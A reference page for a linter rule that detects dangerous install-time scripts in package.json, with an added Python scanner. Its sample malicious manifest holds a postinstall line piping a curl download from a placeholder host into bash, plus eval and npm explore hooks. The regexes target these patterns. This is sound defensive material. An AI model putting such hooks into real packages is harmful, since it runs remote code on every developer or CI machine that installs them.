
Rule Reference

SEC743 (lintai-ai-security, stable, json, warn)

package.json: dangerous lifecycle script

package.json defines a dangerous install-time lifecycle script

Provider: lintai-ai-security
Surface: json
Scope: per_file
Tier: stable
Severity: warn
Confidence: high
Detection: structural
Remediation: message_only

Activation Model

Preset Membership

This rule is part of the builtin activation graph through these preset memberships.

Lifecycle

Stable Lifecycle Contract

State

stable_gated

Graduation rationale

Checks committed package.json install-time lifecycle hooks for explicit download-exec, eval, or npm-explore shell behavior.

Deterministic signal basis

JsonSignals package manifest analysis over `scripts.preinstall|install|postinstall|prepare` values for download-exec patterns, `eval`, or `npm explore` shell execution.

Malicious corpus: package-manifest-dangerous-lifecycle-script
Benign corpus: package-manifest-safe-lifecycle-script
Flags: structured evidence required; remediation reviewed
Canonical note

Structural stable rule intended as a high-precision check with deterministic evidence.

Nearby Signals

Related Rules

Why It Matters

Install-time lifecycle scripts run automatically during dependency installation, so a dangerous committed postinstall or preinstall path can execute attacker-controlled code on every developer or CI machine that installs the package.

What Triggers

SEC743 matches package.json lifecycle hooks such as preinstall, install, postinstall, or prepare when the script includes high-risk behavior like download-and-exec patterns, eval, or npm explore shell execution.

False Positives

Ordinary lifecycle scripts that run local build steps, type checks, or node ./scripts/... helpers do not trigger this rule. The rule is intentionally scoped to clearly dangerous execution patterns.
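The trigger and false-positive scope described above, as an added example that is not lintai's own code: a small structural scan of package.json that only looks at the four install-time hooks and flags the three behaviours the rule names. The regexes, the sample manifests and the host example.invalid are constructed approximations for illustration, not the rule's actual signal definitions.

```python
import json
import re

# The four install-time hooks SEC743 inspects; npm runs them automatically
# during `npm install`, with no action by the person installing.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed approximations of the three behaviours the rule page names;
# the real lintai signal definitions are not on the page.
PATTERNS = {
    # curl/wget output piped straight into an interpreter
    "download-exec": re.compile(
        r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:sh|bash|zsh|node)\b"),
    # a shell `eval` invocation (a path like ./eval.js does not match)
    "eval": re.compile(r"(?:^|[\s;&|(])eval\b"),
    # `npm explore <pkg> -- <cmd>` runs a shell inside another package
    "npm-explore": re.compile(r"\bnpm\s+explore\b"),
}


def scan_manifest(text: str) -> list[dict]:
    """Return one finding per (install hook, pattern) hit; commands under
    non-install scripts such as `test` are ignored (the rule's scope)."""
    scripts = json.loads(text).get("scripts", {})
    findings = []
    for hook in INSTALL_HOOKS:
        command = scripts.get(hook)
        if not isinstance(command, str):
            continue
        for label, pattern in PATTERNS.items():
            match = pattern.search(command)
            if match:
                findings.append({"rule": "SEC743", "hook": hook,
                                 "pattern": label,
                                 "evidence": match.group(0).strip()})
    return findings


# Constructed sample manifests; example.invalid is a placeholder host.
DANGEROUS_MANIFEST = json.dumps({"name": "demo-pkg", "scripts": {
    "preinstall": 'eval "$(cat ./env.sh)"',
    "postinstall": "curl -sSL https://example.invalid/setup.sh | bash",
    "prepare": "npm explore some-dep -- sh ./hook.sh",
    "test": 'eval "$(cat ./env.sh)"',  # not an install hook: ignored
}})
BENIGN_MANIFEST = json.dumps({"name": "demo-pkg", "scripts": {
    "postinstall": "node ./scripts/patch-types.js",
    "prepare": "tsc -p . && npm run lint",
}})
```

Running `scan_manifest` on the dangerous manifest yields three findings (preinstall/eval, postinstall/download-exec, prepare/npm-explore) and nothing for the benign one or for the `test` script.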

Remediation

Remove install-time remote execution behavior from the manifest and keep setup logic local, reviewable, and explicit.